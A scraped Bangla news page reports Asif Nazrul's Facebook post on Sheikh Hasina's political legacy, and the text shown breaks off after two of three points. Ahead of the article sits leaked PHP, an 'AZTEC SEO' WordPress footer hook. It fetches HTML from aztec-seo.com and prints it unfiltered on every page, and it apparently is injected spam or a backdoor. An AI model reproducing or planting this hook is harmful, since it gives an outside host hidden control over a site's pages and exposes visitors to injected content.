/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); শেখ হাসিনার ৩ রাজনৈতিক অবস্থা তুলে ধরলেন আসিফ নজরুল | Dhaka Sky News

ফ্যামিলি কার্ড নারীর অর্থনৈতিক স্বাবলম্বিতা অর্জনে ভূমিকা রাখবে : রাষ্ট্রপতি

আগের সংবাদ

বাংলাদেশ এমন দেশ হবে, যেখানে নারীরা নিরাপদে থাকবেন : জুবাইদা রহমান

পরের সংবাদ

শেখ হাসিনার ৩ রাজনৈতিক অবস্থা তুলে ধরলেন আসিফ নজরুল

অনলাইন ডেস্ক

প্রকাশিত: March 8, 2026 , 4:10 pm

ফ্যাসিস্ট সরকারের প্রধানমন্ত্রী শেখ হাসিনার তিন রাজনৈতিক অবস্থা তুলে ধরে মন্তব্য করেছেন অন্তর্বর্তী সরকারের সাবেক আইন উপদেষ্টা ড. আসিফ নজরুল। রবিবার (৮ মার্চ) দুপুরে সমাজিক যোগাযোগ মাধ্যম ফেসবুক পোস্টে তিনি এ
নিজের ফেসবুক পোস্টে আসিফ নজরুল লিখেছেন, ‘শেখ হাসিনা দেশে নেই বহুদিন। কিন্তু সত্যিই কি নেই? আমার মনে হয় তিনি আছেন।
শারীরিকভাবে নেই, কিন্তু তার রাজনীতিটা রয়ে গেছে বাংলাদেশে। তার রাজনীতির কিছু মূলমন্ত্র ধারন করে আছে তার পতনের আন্দোলনের মানুষদেরও কেউ কেউ।’
কি ছিল তার রাজনীতি?
এক: মালিকানার রাজনীতি। তিনি মুক্তিযুদ্ধের মালিকানার রাজনীতি করতেন।
তিনি আর তার অনুগতরাই কেবল যুদ্ধটা করেছেন, বাকী কেউ না। তাই তার পক্ষে থাকা মানে মুক্তিযুদ্ধের পক্ষে থাকা, তার বিরোধিতা মানে মুক্তিযুদ্ধের বিরোধিতা করা। যে কাজ পক্ষের মানুষের জন্য জায়েজ, তা অন্যর জন্য শাস্তিযোগ্য। জুলাইকে কেন্দ্র করে আছে এই রাজনীতি আছে কিছু মানুষের মধ্যে।
দুই: ট্যাগ দেয়ার রাজনীতি। কথায় কথায় রাজাকার, মুক্তিযুদ্ধের চেতনা বিরোধী, পাকিস্তানপন্থী ছিল তার রাজনীতির অন্যতম হলমার্ক। এসব ট্যাগ বদলিয়েছে, কিন্তু এর রাজনীতিটা রয়ে গেছে। এখন চলছে যত্রতত্র ফ্যাসিষ্ট এর দোসর, ভারতের দালাল, জুলাই গাদ্দার এসব ট্যাগ দেয়ার রাজনীতি। বছরের পর বছর আওয়ামী লীগের হাতে নির্যাতিত কেউ এই ট্যাগ পাচ্ছেন ২০২৪ সালের জুলাই-এর আগ পর্যন্ত আওয়ামী লীগের একনিষ্ঠ কর্মীর কাছে।